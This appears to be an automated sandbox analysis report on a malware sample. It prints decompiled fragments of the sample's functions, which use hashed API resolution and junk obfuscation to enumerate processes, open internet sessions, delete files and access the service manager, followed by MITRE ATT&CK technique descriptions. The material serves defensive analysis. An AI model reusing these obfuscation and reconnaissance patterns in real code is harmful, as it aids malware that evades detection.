				E001F606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x00207fcf
0x00207fd2
0x00207fd4
0x00207fd7
0x00207fda
0x00207fdd
0x00207fdf
0x00207fe4
0x00207fed
0x00207ff4
0x00207ffb
0x00208002
0x0020800e
0x00208013
0x00208018
0x0020801f
0x00208029
0x00208034
0x00208037
0x0020803b
0x00208042
0x00208049
0x00208050
0x0020806f
0x0020807e
0x00208084

APIs

RtlAllocateHeap.NTDLL(216D57E9,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,216D57E9,216D57E9), ref: 0020807E

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1eec4910c5a80c3f0fbcf09dbddd4239708f1d9c1fc9dec4e27e2debbb81c624
Instruction ID: d3025b4418a3d118be31ee457d03186a7a505fee0f836cf95ed2f17783f09118
Opcode Fuzzy Hash: 1eec4910c5a80c3f0fbcf09dbddd4239708f1d9c1fc9dec4e27e2debbb81c624
Instruction Fuzzy Hash: C5115971E0021CEBEF04DFE5C90A8DEBFB2EB41310F108189FA1467250C7B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FE233, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E001FE233(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				int _t56;
				signed int _t58;
				void* _t63;

				_push(_a8);
				_t63 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001FE171(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0x207824;
				_v32 = 0x5ca825;
				_v28 = 0x41d94a;
				_v20 = 0x7881;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x00006f07;
				_v16 = 0x4857;
				_v16 = _v16 | 0x089d9eca;
				_v16 = _v16 ^ 0x89ccdfa9;
				_v16 = _v16 ^ 0x81517cb4;
				_v12 = 0x9d63;
				_v12 = _v12 ^ 0x8284fed9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x08c74906;
				_v8 = 0x78a4;
				_t58 = 0x37;
				_v8 = _v8 * 0x21;
				_v8 = _v8 + 0xffff5146;
				_v8 = _v8 / _t58;
				_t38 = _t58 + 0x60; // 0x97
				_v8 = _v8 ^ 0x0000760a;
				E001F606F(_t38, 0xb6b01ae5, _t58, _t58, 0xd35b4d07);
				_t56 = Process32NextW(_t63, _a4); // executed
				return _t56;
			}

0x001fe23a
0x001fe23d
0x001fe23f
0x001fe243
0x001fe244
0x001fe249
0x001fe24f
0x001fe256
0x001fe25d
0x001fe264
0x001fe26b
0x001fe26f
0x001fe276
0x001fe27d
0x001fe284
0x001fe28b
0x001fe292
0x001fe299
0x001fe2a0
0x001fe2a4
0x001fe2ab
0x001fe2b8
0x001fe2bc
0x001fe2bf
0x001fe2d0
0x001fe2d3
0x001fe2d6
0x001fe2f0
0x001fe2fc
0x001fe302

APIs

Process32NextW.KERNEL32(?,08C74906,?,?,?,?,?,?,?,?), ref: 001FE2FC

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 879bc28ffba1e06be2e95c49ff05cec377e80531e50606502707ba9fffa517b0
Instruction ID: 80b02f9c98e63b964bd86ebd2b1b3558aff303c3ed27868ecb4dbe734477cc80
Opcode Fuzzy Hash: 879bc28ffba1e06be2e95c49ff05cec377e80531e50606502707ba9fffa517b0
Instruction Fuzzy Hash: 2A2104B0D0020CEFDB08DFE5D94A8EEBBB4EB04308F10C199E4156A251D7B96B55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00204CEF, Relevance: 1.6, APIs: 1, Instructions: 54
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00204CEF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a28, long _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				void* _t46;

				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E001FE171(_t37);
				_v12 = 0xc991;
				_v12 = _v12 * 0x6c;
				_v12 = _v12 + 0xfb87;
				_v12 = _v12 ^ 0x00561402;
				_v20 = 0x6a66;
				_v20 = _v20 ^ 0x17a3a394;
				_v20 = _v20 ^ 0x17a3b314;
				_v8 = 0xc565;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 + 0xffff6f7c;
				_v8 = _v8 ^ 0x00142022;
				_v16 = 0xdacb;
				_v16 = _v16 + 0x8a3b;
				_v16 = _v16 ^ 0x00015fcf;
				E001F606F(0x112, 0x262cac91, __ecx, __ecx, 0xd4655b3d);
				_t46 = InternetOpenW(_a16, _a32, 0, 0, 0); // executed
				return _t46;
			}

0x00204cf6
0x00204cfb
0x00204cfe
0x00204cff
0x00204d02
0x00204d05
0x00204d08
0x00204d09
0x00204d0d
0x00204d0e
0x00204d13
0x00204d2c
0x00204d2f
0x00204d36
0x00204d3d
0x00204d44
0x00204d4b
0x00204d52
0x00204d63
0x00204d66
0x00204d6d
0x00204d74
0x00204d7b
0x00204d82
0x00204d95
0x00204da6
0x00204dac

APIs

InternetOpenW.WININET(31BCED90,?,00000000,00000000,00000000), ref: 00204DA6

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c46726e834516cf19103e1f554e65535bb5b52e6b1168b066e67206e11f4e8a2
Instruction ID: feb1e28e1efa02540d5302571aed7da1f437aee39d3d13af128b434da600c65e
Opcode Fuzzy Hash: c46726e834516cf19103e1f554e65535bb5b52e6b1168b066e67206e11f4e8a2
Instruction Fuzzy Hash: BB112FB080021DBBDF00DFA5C94A8DEBFB9FF08354F508188F81466160D7BA8A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F8289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001F8289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E001FE171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E001F606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x001f8290
0x001f8295
0x001f829a
0x001f82a8
0x001f82ab
0x001f82af
0x001f82b5
0x001f82b6
0x001f82bd
0x001f82c4
0x001f82c8
0x001f82cf
0x001f82d6
0x001f82dd
0x001f82e4
0x001f82eb
0x001f82f2
0x001f82f9
0x001f8300
0x001f8307
0x001f8311
0x001f8319
0x001f8332
0x001f833d
0x001f8343

APIs

DeleteFileW.KERNEL32(00001B6C,?,?,?,?,?,?,00000000), ref: 001F833D

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 0a0392e627c78325f35bc7f84c6802196a43d69676bf021ac56550ffddaf33b6
Instruction ID: e29a973da9210f007eeb25cbbd505ef1db047787521e819781fd61d687db5195
Opcode Fuzzy Hash: 0a0392e627c78325f35bc7f84c6802196a43d69676bf021ac56550ffddaf33b6
Instruction Fuzzy Hash: 92115B75E0120CFBEB08DFE9C84A4DEBBB5FB54304F208188E410A7264D3B94B098F50

Uniqueness

Uniqueness Score: -1.00%

Function 00209EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00209EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E001FE171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E001F606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x00209ef2
0x00209ef7
0x00209efa
0x00209efb
0x00209eff
0x00209f00
0x00209f05
0x00209f0f
0x00209f1b
0x00209f1e
0x00209f21
0x00209f28
0x00209f2f
0x00209f36
0x00209f4d
0x00209f50
0x00209f57
0x00209f5e
0x00209f65
0x00209f6c
0x00209f73
0x00209f7a
0x00209f8d
0x00209f9a
0x00209fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,00205A72,0000B2BF), ref: 00209F9A

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 28773dd8cf81eabc8026ab2ac8b9dc53c8c3088d429081e4d120396cfa267bef
Instruction ID: 0d331ec16cfbf0b29e87a5069c6f3767af25289533d77db91fd04d47b9b920fa
Opcode Fuzzy Hash: 28773dd8cf81eabc8026ab2ac8b9dc53c8c3088d429081e4d120396cfa267bef
Instruction Fuzzy Hash: 1F11C3B5D0122DABDB04DFE9C84A9EEBFB4EF05344F108159E815A6250D3755B608FA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F3A1B, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001F3A1B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				intOrPtr* _t49;
				void* _t50;

				E001FE171(_t41);
				_v12 = 0xb6ca;
				_v12 = _v12 << 0xb;
				_v12 = _v12 * 0x29;
				_v12 = _v12 + 0x8b1c;
				_v12 = _v12 ^ 0xea336cc2;
				_v16 = 0xc7a4;
				_v16 = _v16 << 5;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 ^ 0x047bf20c;
				_v20 = 0xabba;
				_v20 = _v20 ^ 0x7dad82f1;
				_v20 = _v20 ^ 0x7dad3ac7;
				_v8 = 0x3ef9;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 + 0xffffb6dd;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0xffff75b6;
				_t49 = E001F606F(0x266, 0xb6b01ae5, __ecx, __ecx, 0xb5cfa41d);
				_t50 =  *_t49(_a8, _a16, __ecx, __edx, _a4, _a8, _a12, _a16); // executed
				return _t50;
			}

0x001f3a2f
0x001f3a34
0x001f3a3e
0x001f3a52
0x001f3a55
0x001f3a5c
0x001f3a63
0x001f3a6a
0x001f3a77
0x001f3a7a
0x001f3a81
0x001f3a88
0x001f3a8f
0x001f3a96
0x001f3a9d
0x001f3aa1
0x001f3aa8
0x001f3aab
0x001f3abe
0x001f3acc
0x001f3ad1

APIs

ProcessIdToSessionId.KERNEL32(047BF20C,?,?,?,?,?,?,?,?,?,?,?), ref: 001F3ACC

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 74c498ea89aab2e14e6ff077a5cf43d5ca52ef2a469895fd4e3dc9d029805a76
Instruction ID: 0346d27473d851a0c9a124ccdfff612a523d05308630e8e37fda19b8113975c7
Opcode Fuzzy Hash: 74c498ea89aab2e14e6ff077a5cf43d5ca52ef2a469895fd4e3dc9d029805a76
Instruction Fuzzy Hash: D611E2B5D0020DABDF05DFE4C94989EBFB1FB04304F608598E925A6261D3BA9B14DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00204C42, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00204C42(void* __ecx, DWORD* __edx, intOrPtr _a4, CHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t35;
				int _t42;
				DWORD* _t46;

				_push(_a8);
				_t46 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001FE171(_t35);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xa9cc8;
				_v20 = 0x3c45;
				_v20 = _v20 ^ 0xf5fc07c2;
				_v20 = _v20 ^ 0xf5fc0712;
				_v16 = 0x8b6d;
				_v16 = _v16 | 0xd22cb672;
				_v16 = _v16 ^ 0xd22ccbf1;
				_v8 = 0x4ab1;
				_v8 = _v8 + 0x84a0;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x019e84cb;
				_v12 = 0x9260;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000071df;
				E001F606F(0x220, 0xb6b01ae5, __ecx, __ecx, 0x95831954);
				_t42 = GetComputerNameA(_a8, _t46); // executed
				return _t42;
			}

0x00204c49
0x00204c4c
0x00204c4e
0x00204c51
0x00204c52
0x00204c53
0x00204c58
0x00204c5f
0x00204c68
0x00204c6f
0x00204c76
0x00204c7d
0x00204c84
0x00204c8b
0x00204c92
0x00204c99
0x00204ca0
0x00204ca7
0x00204cab
0x00204cb2
0x00204cb9
0x00204cbd
0x00204cdc
0x00204ce8
0x00204cee

APIs

GetComputerNameA.KERNEL32(D22CCBF1,?,?,?,?,?,?,?,?), ref: 00204CE8

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9fa11076082d32a32f8e07a0075711743bce164504742797810c9d3cef717936
Instruction ID: fe7b4f24b2e3f24d3ed5290a252f09524b5ecae05a54b403838899b14410774a
Opcode Fuzzy Hash: 9fa11076082d32a32f8e07a0075711743bce164504742797810c9d3cef717936
Instruction Fuzzy Hash: A41128B5D0021CBBEB04DFD5D80A8AEBFB8FF00318F108188E82566251D3B54B149F90

Uniqueness

Uniqueness Score: -1.00%

Function 0020349F, Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0020349F(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t34;
				void* _t40;
				struct tagPROCESSENTRY32W* _t44;

				_push(_a8);
				_t44 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001FE171(_t34);
				_v8 = 0xe3a2;
				_v8 = _v8 << 7;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x000072b6;
				_v20 = 0xa8be;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x2a2fb79e;
				_v12 = 0x54b5;
				_v12 = _v12 | 0x192aadbb;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x55fb03de;
				_v16 = 0x7533;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x0000161f;
				_t40 = E001F606F(0x2fd, 0xb6b01ae5, __ecx, __ecx, 0x7d2377e4);
				Process32FirstW(_a8, _t44); // executed
				return _t40;
			}

0x002034a6
0x002034a9
0x002034ab
0x002034ae
0x002034af
0x002034b0
0x002034b5
0x002034bf
0x002034c8
0x002034cc
0x002034cf
0x002034d6
0x002034dd
0x002034e1
0x002034e8
0x002034ef
0x002034f6
0x002034fa
0x00203501
0x00203508
0x0020350c
0x0020352b
0x00203537
0x0020353d

APIs

Process32FirstW.KERNEL32(0000161F,?,?,?,?,?,?,?,?,?), ref: 00203537

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 0ba4b686800a35a258633f64bfa9eac8ca52a90c1cc1f36c47acb31e2faf24b8
Instruction ID: d48fb5bd2ea62fbd7d45ff14a70f9664c08571e07ff9d56c556697d7c97fee94
Opcode Fuzzy Hash: 0ba4b686800a35a258633f64bfa9eac8ca52a90c1cc1f36c47acb31e2faf24b8
Instruction Fuzzy Hash: 30111575D0121CFBEB05EFD4C84A8EEBBB4EB04718F208598E92567250D7B96B14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00204A7E, Relevance: 1.3, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00204A7E(void* __ecx, intOrPtr _a4, void* _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t42;
				int _t52;
				signed int _t54;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E001FE171(_t42);
				_v20 = 0x2795;
				_v20 = _v20 | 0x18d7a725;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x0000365e;
				_v16 = 0x9060;
				_t54 = 0x63;
				_v16 = _v16 * 0x65;
				_v16 = _v16 / _t54;
				_v16 = _v16 ^ 0x0000bf10;
				_v12 = 0x4b3c;
				_v12 = _v12 ^ 0xede7f6b3;
				_v12 = _v12 | 0xa238c96d;
				_v12 = _v12 ^ 0xefffdbcf;
				_v8 = 0x6ed;
				_v8 = _v8 + 0x38ce;
				_v8 = _v8 | 0x6623d235;
				_v8 = _v8 ^ 0x6623ac01;
				E001F606F(0x27e, 0xb6b01ae5, _t54, _t54, 0x35b9d729);
				_t52 = HeapFree(_a8, 0, _a12); // executed
				return _t52;
			}

0x00204a84
0x00204a87
0x00204a8a
0x00204a8d
0x00204a90
0x00204a95
0x00204a9e
0x00204aa5
0x00204aa9
0x00204ab0
0x00204abd
0x00204ac1
0x00204ace
0x00204ad6
0x00204add
0x00204ae4
0x00204aeb
0x00204af2
0x00204af9
0x00204b00
0x00204b07
0x00204b0e
0x00204b28
0x00204b38
0x00204b3d

APIs

HeapFree.KERNEL32(0000BF10,00000000,0000365E,?,?,?,?,?,?,?,?,000065D1), ref: 00204B38

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0c47f96fa3f465932cffbddcc84fc144d66b605716cdbd8d084bdc112858ee42
Instruction ID: 11a1fb27e1e9e6670cdbe45ed3bec9458e438d5e22a67d019f5baf597e3bae63
Opcode Fuzzy Hash: 0c47f96fa3f465932cffbddcc84fc144d66b605716cdbd8d084bdc112858ee42
Instruction Fuzzy Hash: 9211DA75D0420CFFEF45DFE5C846A9EBBB5FB04304F208598E925A62A1D7B99B109F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

